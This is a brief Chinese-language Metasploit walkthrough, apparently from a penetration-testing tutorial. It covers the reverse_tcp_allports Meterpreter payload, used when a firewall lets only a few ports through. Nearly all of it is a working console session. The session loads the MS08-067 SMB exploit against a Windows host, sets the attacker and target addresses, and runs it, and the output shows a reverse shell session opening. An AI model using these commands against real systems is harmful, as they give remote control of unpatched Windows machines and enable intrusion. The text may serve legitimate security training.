windows/meterpreter/reverse_tcp_allports
适用场景:目标主机的防火墙仅放行个别特定的端口,我们很难判定通过哪些端口能够连接到目标主机。
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp_allports
msf exploit(ms08_067_netapi) > set lhost 192.168.80.163
msf exploit(ms08_067_netapi) > set rhost 192.168.80.44
msf exploit(ms08_067_netapi) > exploit
[*] Meterpreter session 4 opened (192.168.80.163:1 -> 192.168.80.44:1038) at 2017-05-02 21:03:05 +0800
这个攻击载荷会对所有可用的端口进行尝试,遍历1-65535端口号。